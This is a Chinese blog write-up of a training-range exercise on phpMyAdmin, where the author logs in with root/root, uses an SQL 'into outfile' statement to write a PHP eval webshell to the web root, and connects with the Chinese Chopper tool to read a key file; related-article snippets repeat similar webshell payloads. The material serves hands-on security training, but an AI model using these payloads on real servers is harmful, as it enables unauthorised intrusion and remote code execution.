墨者学院-入门级-phpMyAdmin后台文件包含分析溯源-小白必看(超详细)

最新推荐文章于 2024-07-23 08:58:50 发布
最新推荐文章于 2024-07-23 08:58:50 发布
阅读量1.3k 收藏 17
点赞数 3
分类专栏: 墨者学院-入门级 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kitiu666/article/details/113175493
版权

2021年1月26日,第六次渗透测试。
实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干!

准备需求:
1、win10系统;
2、中国菜刀;

1、进入靶场
账号:root 密码:root
这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟);
在这里插入图片描述
2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行;
select ‘<?php eval($_POST[key]); ?>’ into outfile ‘/var/www/html/hacker.php’;
在这里插入图片描述
执行后的页面显示;
在这里插入图片描述
3、打开中国菜刀软件添加新的地址,下面的格式选择UTF-8,完成编辑后,进入后台;
注:地址栏不要照抄,因为每次开启靶场产生的端口号都不一样,所以按照自己的实际进行填写;
在这里插入图片描述
这是进入后的画面,可以查看到所有的配置文件;
在这里插入图片描述
还能查看到我们刚刚在sql控制台上传的后台文件,文件名:hacker.php,点击进去后看到我们输入的内容;
在这里插入图片描述
在这里插入图片描述
2 、3点结合分析:

  • 在sql命令行命令中输入的[ ]中的内容为webshell密码,与菜刀上地址栏后面的输入框对应;
  • 地址栏的后缀对应sql命令中html后面的文件名;
    在这里插入图片描述
    4、到根目录下,找到key.txt文件打开就可以看到钥匙了。
    在这里插入图片描述
    在这里插入图片描述

中国菜刀介绍:
在这里插入图片描述
从百度可以看到菜刀本来是一个网站的管理工具,但或许过于强大,后来变成了黑客的攻击工具,现在按功能说的话名字是“远程webshell工具”,网友们称为“中国菜刀”。
具体用法网上挺多的,而且操作也不难,我就不再多说。

小潜疯
关注
专栏目录
phpMyAdmin后台文件包含分析溯源
qq_40554015的博客
11-12 3278
phpMyAdmin 漏洞利用汇总:PhpMyAdmin漏洞利用汇总 - 只言 - 博客园 漏洞编号:CVE-2018-12613 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 一.弱口令登录 root-root 二.利用sql语句,将php代码写入Session文件中 三.包含Session文件 http://219.153.49.228:44273/
墨者学院-phpMyAdmin后台文件包含分析溯源
qq_47094508的博客
07-01 1331
首先拿到题目到点击访问访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器账户密码:root root点击sql模块 对sql语句进行一个查询首先查询sql写一句话的权限我们可以看到他的值为空secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/ 接下来确认一下mysql权限,可以看到这里是最高权限r
phpmyadmin 文件包含(CVE-2014-8959)
最新发布
qq_23003811的博客
07-23 218
其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。访问http://ip:port/pma即可进入phpmyadmin。> ,测试账号密码:pmatest/pmatest。2、访问地址,burp抓包修改请示方式为POST,请求参数为a=phpinfo();,请求类型为Content-Type:application/x-www-form-urlencoded。1、登录,测试账号密码:pmatest/pmatest,拿到token。4.2.x 4.2.12以下。
墨者学院10 phpMyAdmin后台文件包含分析溯源
weixin_42789937的博客
02-12 526
墨者学院10 phpMyAdmin后台文件包含分析溯源,本文整理了评论区的三种解法,解题过程七分靠技术,三分靠运气~
phpmyadmin后台4种拿shell方法及php爆路径收集
weixin_30367873的博客
08-31 1216
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源
qq_43233085的博客
01-13 865
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞的利用方式。 解题方向 根据漏洞编号找到相关知识。 解题步骤 启动靶场...
墨者】靶场练习——phpMyAdmin后台文件包含分析溯源
weixin_63082823的博客
12-12 565
首先我们启动靶场,点击访问就会跳转到phpMyAdmin的登陆页面,我们使用弱口令root,root登录。
墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)
曹振国的博客
06-15 5284
phpMyAdmin第一种:一、利用burp爆破出账号密码二、尝试写马连入蚁剑1.发现MySQL对导入导出没做任何限制2.查询日志3.利用日志写文件4.访问写入的日志文件6.尝试直接通过into outfile写入一句话木马7.访问phpinfo文件,并连接蚁剑得到key值第二种:一、下载index.php文件进行分析1.发现55到63行存在问题二、下载Core.php进行分析1.找到checkPageValidity函数,在第443行2.查看白名单数组$whitelist3.包含根目录下的key.txt得
墨者学院_phpMyAdmin后台文件包含分析溯源
cc_de_csdn的博客
08-22 2538
墨者学院_phpMyAdmin后台文件包含分析溯源 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响 前台可以使用弱口令直接登录...
07#墨者靶场-phpMyAdmin后台文件包含分析溯源
shy的博客
11-22 1487
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 1.在墨者学院找到...
phpMyAdmin后台文件包含分析溯源(CVE-2018-12613)--墨者学院
小白鸽
08-03 771
01 背景介绍 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 02 影响版本 phpMyAdmin 4.8.0和4.8.1 03 利用方式 1.写phpinfo文件,利用文件包含,查看绝对路径, select '<?php phpinfo()?>' 2.写小马 select '<?ph
墨者学院——phpMyAdmin后台文件包含分析溯源
知足且坚定,温柔且上进
02-09 533
此题利用一句话木马 进入登陆界面,用burpsuite爆破得到username与password都为:root 进入SQL界面,输入一句话木马(密码为leo),点击“执行”: select "<?php eval($_post[leo]);?>" into outfile "/var/www/html/3.php" 此时打开蚁剑(注意:url后面记得跟上一句话木马目标的页面3....
墨者学院---phpMyAdmin后台文件包含分析溯源--解题思路
weixin_43071873的博客
08-27 483
进入后台,使用弱口令尝试登入 如admin~admin,root-root等 本题为root-root 点到SQL,发现可以进行sql语句 select ‘<?php eval($_POST[giao]);?>’ into outfile ‘/var/www/html/2.php’ 3.执行成功 4.上菜刀 5.在根目录可以找到本题所需要的key 在www/html目录中可以找到写入的一句话木马 ...
CVE-2018-12613 PhpMyadmin后台文件包含
baidu_26383841的博客
12-20 1042
当我们访问开放了用户注册和登录入口的站点时,正常情况下,用户访问每个页面站点都要检查当前登录的用户是否具有该页面的权限;如果站点不对用户权限进行检查,那么用户就可以访问该站点的任意页面,甚至可以查看其他用户的主页信息等。因此对用户访问的每个页面都进行权限检查是网站必须执行的操作。而实现该操作需要在每一个页面中都写一段检查用户权限的代码,而检查用户的权限执行的是相同的逻辑操作,这就意味着每个页面都存在一段相同的代码,这是一个不理想的状态。
0x01.phpMyAdmin后台文件包含分析溯源
qq_31679787的博客
09-11 972
登录界面; phpmyadmin的默认账户名密码是root/空,或者是root/root,尝试后发现是root/root; 通过打开新的phpmyadmin窗口,发现所有参数; 根据cve-2018-12613漏洞可以得到网站根目录/var/www/html; 首先select '<?php phpinfo();?>';然后通过payload构造文件包含; payl...
墨者学院-日志文件分析溯源(Google蜘蛛)
qq_37850901的博客
09-27 287
根据题意,搜索谷歌爬虫的ip,在日志中ctrl+f尝试搜索bot 或google,结果中出现了这个 验证ip得到key
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值